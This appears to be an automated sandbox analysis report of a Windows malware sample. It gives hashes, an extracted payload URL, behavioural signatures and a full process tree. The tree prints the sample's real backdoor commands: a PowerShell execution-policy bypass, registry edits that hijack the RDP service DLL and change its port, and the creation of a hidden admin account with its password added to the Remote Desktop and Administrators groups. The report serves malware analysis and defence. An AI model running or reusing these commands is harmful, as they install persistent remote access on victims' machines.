Resubmissions
02-09-2021 16:57
210902-vgpzjadhhn 1002-09-2021 16:25
210902-tw1h5sage4 1002-09-2021 11:31
210902-9dk89x9wb2 1014-08-2021 13:56
210814-xdxpv1yk2x 10Analysis
-
max time kernel
50s -
max time network
117s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
14-08-2021 13:56
Static task
static1
Behavioral task
behavioral1
Sample
472208d7ba18d4c14b7e90b9db5d6feb.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
472208d7ba18d4c14b7e90b9db5d6feb.exe
Resource
win10v20210410
General
-
Target
472208d7ba18d4c14b7e90b9db5d6feb.exe
-
Size
5.9MB
-
MD5
472208d7ba18d4c14b7e90b9db5d6feb
-
SHA1
ff24cc43998ff99e61b1a838e1d51c4888498935
-
SHA256
ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d
-
SHA512
9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 18 3908 powershell.exe 20 3908 powershell.exe 21 3908 powershell.exe 22 3908 powershell.exe 24 3908 powershell.exe 26 3908 powershell.exe 28 3908 powershell.exe 30 3908 powershell.exe 32 3908 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 3676 3676 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_hqhgangy.rou.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI71DA.tmp powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_hkbi454m.uo3.psm1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI71FA.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI722C.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI720B.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI721C.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 24 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3172 powershell.exe 3172 powershell.exe 3172 powershell.exe 2180 powershell.exe 2180 powershell.exe 2180 powershell.exe 2416 powershell.exe 2416 powershell.exe 2416 powershell.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 3172 powershell.exe 3172 powershell.exe 3172 powershell.exe 3908 powershell.exe 3908 powershell.exe 3908 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 624 624 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
472208d7ba18d4c14b7e90b9db5d6feb.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3700 472208d7ba18d4c14b7e90b9db5d6feb.exe Token: SeDebugPrivilege 3172 powershell.exe Token: SeDebugPrivilege 2180 powershell.exe Token: SeIncreaseQuotaPrivilege 2180 powershell.exe Token: SeSecurityPrivilege 2180 powershell.exe Token: SeTakeOwnershipPrivilege 2180 powershell.exe Token: SeLoadDriverPrivilege 2180 powershell.exe Token: SeSystemProfilePrivilege 2180 powershell.exe Token: SeSystemtimePrivilege 2180 powershell.exe Token: SeProfSingleProcessPrivilege 2180 powershell.exe Token: SeIncBasePriorityPrivilege 2180 powershell.exe Token: SeCreatePagefilePrivilege 2180 powershell.exe Token: SeBackupPrivilege 2180 powershell.exe Token: SeRestorePrivilege 2180 powershell.exe Token: SeShutdownPrivilege 2180 powershell.exe Token: SeDebugPrivilege 2180 powershell.exe Token: SeSystemEnvironmentPrivilege 2180 powershell.exe Token: SeRemoteShutdownPrivilege 2180 powershell.exe Token: SeUndockPrivilege 2180 powershell.exe Token: SeManageVolumePrivilege 2180 powershell.exe Token: 33 2180 powershell.exe Token: 34 2180 powershell.exe Token: 35 2180 powershell.exe Token: 36 2180 powershell.exe Token: SeDebugPrivilege 2416 powershell.exe Token: SeIncreaseQuotaPrivilege 2416 powershell.exe Token: SeSecurityPrivilege 2416 powershell.exe Token: SeTakeOwnershipPrivilege 2416 powershell.exe Token: SeLoadDriverPrivilege 2416 powershell.exe Token: SeSystemProfilePrivilege 2416 powershell.exe Token: SeSystemtimePrivilege 2416 powershell.exe Token: SeProfSingleProcessPrivilege 2416 powershell.exe Token: SeIncBasePriorityPrivilege 2416 powershell.exe Token: SeCreatePagefilePrivilege 2416 powershell.exe Token: SeBackupPrivilege 2416 powershell.exe Token: SeRestorePrivilege 2416 powershell.exe Token: SeShutdownPrivilege 2416 powershell.exe Token: SeDebugPrivilege 2416 powershell.exe Token: SeSystemEnvironmentPrivilege 2416 powershell.exe Token: SeRemoteShutdownPrivilege 2416 powershell.exe Token: SeUndockPrivilege 2416 powershell.exe Token: SeManageVolumePrivilege 2416 powershell.exe Token: 33 2416 powershell.exe Token: 34 2416 powershell.exe Token: 35 2416 powershell.exe Token: 36 2416 powershell.exe Token: SeDebugPrivilege 1296 powershell.exe Token: SeIncreaseQuotaPrivilege 1296 powershell.exe Token: SeSecurityPrivilege 1296 powershell.exe Token: SeTakeOwnershipPrivilege 1296 powershell.exe Token: SeLoadDriverPrivilege 1296 powershell.exe Token: SeSystemProfilePrivilege 1296 powershell.exe Token: SeSystemtimePrivilege 1296 powershell.exe Token: SeProfSingleProcessPrivilege 1296 powershell.exe Token: SeIncBasePriorityPrivilege 1296 powershell.exe Token: SeCreatePagefilePrivilege 1296 powershell.exe Token: SeBackupPrivilege 1296 powershell.exe Token: SeRestorePrivilege 1296 powershell.exe Token: SeShutdownPrivilege 1296 powershell.exe Token: SeDebugPrivilege 1296 powershell.exe Token: SeSystemEnvironmentPrivilege 1296 powershell.exe Token: SeRemoteShutdownPrivilege 1296 powershell.exe Token: SeUndockPrivilege 1296 powershell.exe Token: SeManageVolumePrivilege 1296 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
472208d7ba18d4c14b7e90b9db5d6feb.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 3700 wrote to memory of 3172 3700 472208d7ba18d4c14b7e90b9db5d6feb.exe powershell.exe PID 3700 wrote to memory of 3172 3700 472208d7ba18d4c14b7e90b9db5d6feb.exe powershell.exe PID 3172 wrote to memory of 2868 3172 powershell.exe csc.exe PID 3172 wrote to memory of 2868 3172 powershell.exe csc.exe PID 2868 wrote to memory of 2940 2868 csc.exe cvtres.exe PID 2868 wrote to memory of 2940 2868 csc.exe cvtres.exe PID 3172 wrote to memory of 2180 3172 powershell.exe powershell.exe PID 3172 wrote to memory of 2180 3172 powershell.exe powershell.exe PID 3172 wrote to memory of 2416 3172 powershell.exe powershell.exe PID 3172 wrote to memory of 2416 3172 powershell.exe powershell.exe PID 3172 wrote to memory of 1296 3172 powershell.exe powershell.exe PID 3172 wrote to memory of 1296 3172 powershell.exe powershell.exe PID 3172 wrote to memory of 2120 3172 powershell.exe reg.exe PID 3172 wrote to memory of 2120 3172 powershell.exe reg.exe PID 3172 wrote to memory of 1916 3172 powershell.exe reg.exe PID 3172 wrote to memory of 1916 3172 powershell.exe reg.exe PID 3172 wrote to memory of 2740 3172 powershell.exe reg.exe PID 3172 wrote to memory of 2740 3172 powershell.exe reg.exe PID 3172 wrote to memory of 3912 3172 powershell.exe net.exe PID 3172 wrote to memory of 3912 3172 powershell.exe net.exe PID 3912 wrote to memory of 2420 3912 net.exe net1.exe PID 3912 wrote to memory of 2420 3912 net.exe net1.exe PID 3172 wrote to memory of 3940 3172 powershell.exe cmd.exe PID 3172 wrote to memory of 3940 3172 powershell.exe cmd.exe PID 3940 wrote to memory of 3580 3940 cmd.exe cmd.exe PID 3940 wrote to memory of 3580 3940 cmd.exe cmd.exe PID 3580 wrote to memory of 2272 3580 cmd.exe net.exe PID 3580 wrote to memory of 2272 3580 cmd.exe net.exe PID 2272 wrote to memory of 2184 2272 net.exe net1.exe PID 2272 wrote to memory of 2184 2272 net.exe net1.exe PID 3172 wrote to memory of 2072 3172 powershell.exe cmd.exe PID 3172 wrote to memory of 2072 3172 powershell.exe cmd.exe PID 2072 wrote to memory of 1512 2072 cmd.exe cmd.exe PID 2072 wrote to memory of 1512 2072 cmd.exe cmd.exe PID 1512 wrote to memory of 1800 1512 cmd.exe net.exe PID 1512 wrote to memory of 1800 1512 cmd.exe net.exe PID 1800 wrote to memory of 1344 1800 net.exe net1.exe PID 1800 wrote to memory of 1344 1800 net.exe net1.exe PID 508 wrote to memory of 2180 508 cmd.exe net.exe PID 508 wrote to memory of 2180 508 cmd.exe net.exe PID 2180 wrote to memory of 1208 2180 net.exe net1.exe PID 2180 wrote to memory of 1208 2180 net.exe net1.exe PID 3296 wrote to memory of 1376 3296 cmd.exe net.exe PID 3296 wrote to memory of 1376 3296 cmd.exe net.exe PID 1376 wrote to memory of 3908 1376 net.exe net1.exe PID 1376 wrote to memory of 3908 1376 net.exe net1.exe PID 3940 wrote to memory of 2740 3940 cmd.exe net.exe PID 3940 wrote to memory of 2740 3940 cmd.exe net.exe PID 2740 wrote to memory of 2636 2740 net.exe net1.exe PID 2740 wrote to memory of 2636 2740 net.exe net1.exe PID 1296 wrote to memory of 2496 1296 cmd.exe net.exe PID 1296 wrote to memory of 2496 1296 cmd.exe net.exe PID 2496 wrote to memory of 2272 2496 net.exe net1.exe PID 2496 wrote to memory of 2272 2496 net.exe net1.exe PID 3912 wrote to memory of 2480 3912 cmd.exe net.exe PID 3912 wrote to memory of 2480 3912 cmd.exe net.exe PID 2480 wrote to memory of 1300 2480 net.exe net1.exe PID 2480 wrote to memory of 1300 2480 net.exe net1.exe PID 3180 wrote to memory of 2880 3180 cmd.exe net.exe PID 3180 wrote to memory of 2880 3180 cmd.exe net.exe PID 2880 wrote to memory of 2628 2880 net.exe net1.exe PID 2880 wrote to memory of 2628 2880 net.exe net1.exe PID 1332 wrote to memory of 2180 1332 cmd.exe WMIC.exe PID 1332 wrote to memory of 2180 1332 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\h5gwndpi\h5gwndpi.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3713.tmp" "c:\Users\Admin\AppData\Local\Temp\h5gwndpi\CSCE88D18F7685843079321122E24848875.TMP"4⤵PID:2940
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2180 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2416 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1296 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2120
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:1916 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2740
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:2420
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2184
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1344
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:3196
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1376
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:508 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:1208
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 40AuUe9q /add1⤵
- Suspicious use of WriteProcessMemory
PID:3296 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 40AuUe9q /add2⤵
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 40AuUe9q /add3⤵PID:3908
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:2636
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD3⤵PID:2272
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1300
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 40AuUe9q1⤵
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 40AuUe9q2⤵
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 40AuUe9q3⤵PID:2628
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
PID:2180
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:3296
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
PID:3348
-
